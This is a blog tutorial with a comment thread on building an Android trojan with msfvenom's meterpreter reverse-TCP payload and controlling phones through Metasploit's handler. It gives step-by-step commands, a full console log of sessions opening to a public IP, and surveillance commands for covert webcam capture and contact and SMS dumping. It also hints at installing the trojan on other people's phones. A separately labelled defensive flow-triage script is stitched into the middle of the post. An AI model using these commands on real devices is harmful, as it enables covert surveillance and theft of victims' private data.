How to use Kali to generate a trojan and compromise an Android phone

By admin

2018-11-24 16:35:11

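Let's begin

First check Kali's IP address; mine is 1.114


Then enter the command: msfvenom -p android/meterpreter/reverse_tcp LHOST=<your Kali IP> LPORT=5555 R > /root/apk.apk
5555 is the port being set; you can change it yourself.  If this is displayed, the APK has been generated successfully.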


Then start msf: msfconsole  Then enter the commands:
1. use exploit/multi/handler   // load the module

2. set payload android/meterpreter/reverse_tcp   // select the payload

3. show options   // view the option settings



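This payload has two parameters that must be set, LHOST and LPORT, which are the address and the port. The default port is 4444. Now let's change the settings.

1. set LHOST 192.168.1.114   // set this to the IP address used when generating the trojan just now

2. set LPORT 5555   // set this to the port chosen when generating the trojan just now

3. exploit   // run the module: start listening and wait for the phone to come online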
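
Seen from the network, a session with this handler is an outbound connection from the phone to the listener port, followed at once by the stage download (70525 bytes in the console output posted in the comments). The following is an added example for defensive triage, not part of the original post; the flow-record format, the sample records, the monitored subnet and the byte thresholds are assumptions made for illustration.

```python
"""Triage flow records for the shape of a staged reverse-TCP session.
Assumed record format (constructed for this example, not a real product's):
  <epoch> <src_ip> <dst_ip> <dst_port> <bytes_out> <bytes_in> <duration_s>"""
import ipaddress
from collections import namedtuple

HANDLER_PORTS = {4444, 5555}    # default LPORT, and the port this tutorial sets
MIN_STAGE_BYTES = 60_000        # assumption: a little under the 70525-byte stage
DEVICE_NET = ipaddress.ip_network("192.168.1.0/24")  # assumed monitored LAN
Finding = namedtuple("Finding", "src dst port score reasons")

def score_flow(line):
    """Return a Finding for a suspicious record, or None."""
    parts = line.split()
    if len(parts) != 7:
        return None             # malformed record: skip it
    _, src, dst, port, b_out, b_in, _ = parts
    try:
        port, b_out, b_in = int(port), int(b_out), int(b_in)
        if ipaddress.ip_address(src) not in DEVICE_NET:
            return None         # only connections our own devices initiated
    except ValueError:
        return None
    reasons = []
    if port in HANDLER_PORTS:
        reasons.append("known handler port")
    # LPORT is configurable, so also match the transfer shape: the client
    # sends almost nothing and is immediately sent a large blob (the stage).
    if b_in >= MIN_STAGE_BYTES and b_out < 1024:
        reasons.append("large inbound transfer after tiny request")
    return Finding(src, dst, port, len(reasons), reasons) if reasons else None

def triage(lines):
    """Score every record and return findings, strongest first."""
    found = [f for f in map(score_flow, lines) if f]
    return sorted(found, key=lambda f: -f.score)

SAMPLE = [  # constructed records, not captured traffic
    "1543248465 192.168.1.152 192.168.1.129 5555 310 71240 95",
    "1543248470 192.168.1.152 203.0.113.10 443 2100 88000 12",
    "1543248480 192.168.1.77 198.51.100.7 9001 200 70900 40",
    "garbage line",
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f)
```

A record that matches both rules is the strongest lead; one that matches only the transfer shape still deserves a look, because the port is whatever the operator chose.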


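Getting the trojan installed on someone else's phone is up to you; for this test I simply installed it on my own phone.

360 gave no warning at any point during installation~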




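The part boxed in red shows that the phone has come online. You can then enter sysinfo to view the phone's information.


webcam_list shows how many cameras the phone has; here it shows 2.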




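webcam_stream  // start the camera stream
webcam_snap // covert photo capture
dump_contacts // export phone numbers
dump_sms  // export messages
You can enter ? to see more commands.

OK, go and test it yourself.
Do not use this for illegal purposes.
End of tutorial.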

4 comments

  • 5F
    admin 2018-11-27 00:16:03
    root@Kali:~# ifconfig
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.1.129  netmask 255.255.255.0  broadcast 192.168.1.255
            inet6 fe80::20c:29ff:fef3:4a8c  prefixlen 64  scopeid 0x20<link>
            ether 00:0c:29:f3:4a:8c  txqueuelen 1000  (Ethernet)
            RX packets 106  bytes 8696 (8.4 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 91  bytes 6187 (6.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 20  bytes 1116 (1.0 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 20  bytes 1116 (1.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    root@Kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=111.199.246.64 LPORT=5555 R > /root/666.apk
    [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
    [-] No arch selected, selecting arch: dalvik from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 10089 bytes
    
    root@Kali:~# msfconsole
    [-] Failed to connect to the database: could not connect to server: Connection refused
    	Is the server running on host "localhost" (::1) and accepting
    	TCP/IP connections on port 5432?
    could not connect to server: Connection refused
    	Is the server running on host "localhost" (127.0.0.1) and accepting
    	TCP/IP connections on port 5432?
    
                                                      
    
             .                                         .
     .
    
          dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
           '   dB'                     BBP
        dB'dB'dB' dBBP     dBP     dBP BB
       dB'dB'dB' dBP      dBP     dBP  BB
      dB'dB'dB' dBBBBP   dBP     dBBBBBBB
    
                                       dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
              .                  .                  dB' dBP    dB'.BP
                                 |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                               --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                                 |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP
    
                                                                        .
                    .
            o                  To boldly go where no
                                shell has gone before
    
    
           =[ metasploit v4.17.21-dev                         ]
    + -- --=[ 1822 exploits - 1033 auxiliary - 316 post       ]
    + -- --=[ 539 payloads - 42 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    
    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
    payload => android/meterpreter/reverse_tcp
    msf exploit(multi/handler) > show options
    
    Module options (exploit/multi/handler):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Payload options (android/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Wildcard Target
    
    
    msf exploit(multi/handler) > set LHOST 111.199.246.64
    LHOST => 111.199.246.64
    msf exploit(multi/handler) > set LPORT 5555
    LPORT => 5555
    msf exploit(multi/handler) > show options
    
    Module options (exploit/multi/handler):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Payload options (android/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  111.199.246.64   yes       The listen address (an interface may be specified)
       LPORT  5555             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Wildcard Target
    
    
    msf exploit(multi/handler) > exploit
    
    [-] Handler failed to bind to 111.199.246.64:5555:-  -
    [*] Started reverse TCP handler on 0.0.0.0:5555 
    [*] Sending stage (70525 bytes) to 192.168.1.152
    [*] Meterpreter session 1 opened (192.168.1.129:5555 -> 192.168.1.152:33923) at 2018-11-27 00:07:45 +0800
    
    meterpreter > 
    [*] 192.168.1.152 - Meterpreter session 1 closed.  Reason: Died
    webcam_snap
    [-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
    msf exploit(multi/handler) > dump_sms
    [-] Unknown command: dump_sms.
    msf exploit(multi/handler) > ?
    
    Core Commands
    =============
    
        Command       Description
        -------       -----------
        ?             Help menu
        banner        Display an awesome metasploit banner
        cd            Change the current working directory
        color         Toggle color
        connect       Communicate with a host
        exit          Exit the console
        get           Gets the value of a context-specific variable
        getg          Gets the value of a global variable
        grep          Grep the output of another command
        help          Help menu
        history       Show command history
        load          Load a framework plugin
        quit          Exit the console
        repeat        Repeat a list of commands
        route         Route traffic through a session
        save          Saves the active datastores
        sessions      Dump session listings and display information about sessions
        set           Sets a context-specific variable to a value
        setg          Sets a global variable to a value
        sleep         Do nothing for the specified number of seconds
        spool         Write console output into a file as well the screen
        threads       View and manipulate background threads
        unload        Unload a framework plugin
        unset         Unsets one or more context-specific variables
        unsetg        Unsets one or more global variables
        version       Show the framework and console library version numbers
    
    
    Module Commands
    ===============
    
        Command       Description
        -------       -----------
        advanced      Displays advanced options for one or more modules
        back          Move back from the current context
        info          Displays information about one or more modules
        loadpath      Searches for and loads modules from a path
        options       Displays global options or for one or more modules
        popm          Pops the latest module off the stack and makes it active
        previous      Sets the previously loaded module as the current module
        pushm         Pushes the active or list of modules onto the module stack
        reload_all    Reloads all modules from all defined module paths
        search        Searches module names and descriptions
        show          Displays modules of a given type, or all modules
        use           Selects a module by name
    
    
    Job Commands
    ============
    
        Command       Description
        -------       -----------
        handler       Start a payload handler as job
        jobs          Displays and manages jobs
        kill          Kill a job
        rename_job    Rename a job
    
    
    Resource Script Commands
    ========================
    
        Command       Description
        -------       -----------
        makerc        Save commands entered since start to a file
        resource      Run the commands stored in a file
    
    
    Developer Commands
    ==================
    
        Command       Description
        -------       -----------
        edit          Edit the current module or a file with the preferred editor
        irb           Open an interactive Ruby shell in the current context
        log           Display framework.log paged to the end if possible
        pry           Open the Pry debugger on the current module or Framework
        reload_lib    Reload Ruby library files from specified paths
    
    
    Database Backend Commands
    =========================
    
        Command           Description
        -------           -----------
        db_connect        Connect to an existing database
        db_disconnect     Disconnect from the current database instance
        db_export         Export a file containing the contents of the database
        db_import         Import a scan result file (filetype will be auto-detected)
        db_nmap           Executes nmap and records the output automatically
        db_rebuild_cache  Rebuilds the database-stored module cache
        db_status         Show the current database status
        hosts             List all hosts in the database
        loot              List all loot in the database
        notes             List all notes in the database
        services          List all services in the database
        vulns             List all vulnerabilities in the database
        workspace         Switch between database workspaces
    
    
    Credentials Backend Commands
    ============================
    
        Command       Description
        -------       -----------
        creds         List all credentials in the database
    
    
    Exploit Commands
    ================
    
        Command       Description
        -------       -----------
        check         Check to see if a target is vulnerable
        exploit       Launch an exploit attempt
        rcheck        Reloads the module and checks if the target is vulnerable
        recheck       Alias for rcheck
        reload        Just reloads the module
        rerun         Alias for rexploit
        rexploit      Reloads the module and launches an exploit attempt
        run           Alias for exploit
    
    msf exploit(multi/handler) > run
    
    [-] Handler failed to bind to 111.199.246.64:5555:-  -
    [*] Started reverse TCP handler on 0.0.0.0:5555 
    [*] Sending stage (70525 bytes) to 111.199.246.64
    [*] Meterpreter session 2 opened (192.168.1.129:5555 -> 111.199.246.64:60506) at 2018-11-27 00:10:31 +0800
    [*] Sending stage (70525 bytes) to 111.199.246.64
    [*] Meterpreter session 3 opened (192.168.1.129:5555 -> 111.199.246.64:60478) at 2018-11-27 00:10:32 +0800
    [*] Sending stage (70525 bytes) to 111.199.246.64
    
    meterpreter > dump_contacts
    [*] No contacts were found!
    meterpreter > dump_sms
    [*] No sms messages were found!
    meterpreter > webcam_snap
    [*] Starting...
    [+] Got frame
    [*] Stopped
    Webcam shot saved to: /root/swnuVBGh.jpeg
    meterpreter > 
    

    Founder:
    This is the full test run

    0
  • 4F
    guest 2018-11-24 16:46:53
    0
  • 3F
    默默 2018-11-24 16:46:31
    Taking a look
    0
  • 2F
    guest 2018-11-24 16:45:34
    Works
    0